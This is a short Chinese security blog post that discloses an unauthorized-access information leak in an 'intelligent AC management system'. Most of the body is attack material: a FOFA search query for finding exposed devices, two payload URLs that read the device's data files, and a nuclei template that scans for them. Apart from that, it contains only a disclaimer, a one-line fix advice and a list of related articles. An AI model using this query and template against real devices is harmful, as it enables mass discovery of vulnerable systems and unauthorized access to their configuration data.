智能AC管理系统信息泄露漏洞

扣脚大汉在网络2024-09-20 20:19

文章目录

免责声明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

漏洞描述

智能AC管理系统是一个控制管理系统因存在未授权访问导致信息泄露

搜索语法

fofa

复制代码 
header="HTTPD_ac 1.0"

漏洞复现

payload

复制代码 
http://ip/actpt.data

payload

复制代码 
http://ip/actpt_5g.data

yaml

yaml 复制代码 
id: intelligent-AC-Manage-system-Information-breaches

info: 
 name: 智能AC管理系统信息泄露漏洞
 author: xl
 description: information breaches
 severity: high

http: 
  - raw: 
      - |+
         GET /actpt.data HTTP/1.1
         Host: {{Hostname}} 
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36
  - raw: 
      - |+
         GET /actpt_5g.data HTTP/1.1
         Host: {{Hostname}} 
         User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.57 Safari/537.36

matchers-condition: and
matchers: 
  - type: word
    part: body
    words: 
      - 'ap_name'
  - type: status
    status:
      - 200

修复建议

更新到最新版本

相关推荐
远方2358 天前
Android无需授权直接访问Android/data目录漏洞
android·安全·文件·漏洞·目录·权限
浮江雾11 天前
XXE漏洞1-XXE 漏洞简介-XML 语法-DTD 讲解-外部实体讲解
xml·安全·web安全·漏洞·xxe
IT 青年15 天前
Windows 用户账户控制(UAC)绕过漏洞
漏洞
IT 青年17 天前
HTTP请求走私漏洞
漏洞
智云软件测评服务1 个月前
Web应用安全漏洞扫描:原理、常用方法及潜在风险解析?
应用·漏洞·扫描
网安INF2 个月前
CVE-2024-23897源码分析与漏洞复现(Jenkins 任意文件读取)
java·web安全·网络安全·jenkins·漏洞
网安INF2 个月前
CVE-2020-17519源码分析与漏洞复现(Flink 任意文件读取)
java·web安全·网络安全·flink·漏洞
网安INF2 个月前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)
java·web安全·网络安全·kafka·漏洞·jndi注入
网安INF2 个月前
CVE-2020-17518源码分析与漏洞复现(Flink 路径遍历)
java·web安全·网络安全·flink·漏洞
不知几秋2 个月前
pikachu通关教程-File Inclusion
漏洞
热门推荐
01Qwen3-Coder 快速上手教程 | Qwen Code + Claude Code02扣子开源本地部署教程 丨Coze智能体小白喂饭级指南03Coze 开源了,送上保姆级私有化部署方案【建议收藏】04全球最强模型Grok4,国内已可免费使用!(附教程)05vue数据变化但页面不变06KGG转MP3工具|非KGM文件|解密音频07干翻 Typora!MilkUp:完全免费的桌面端 Markdown 编辑器!0801-开源版COZE-字节 Coze Studio 重磅开源!保姆级本地安装教程,手把手带你体验09腾讯还是太全面了,限时免费!超全CodeBuddy IDE保姆级教程!(附案例)10sqli-labs 靶场 less-8、9、10 第八关到第十关详解:布尔注入,时间注入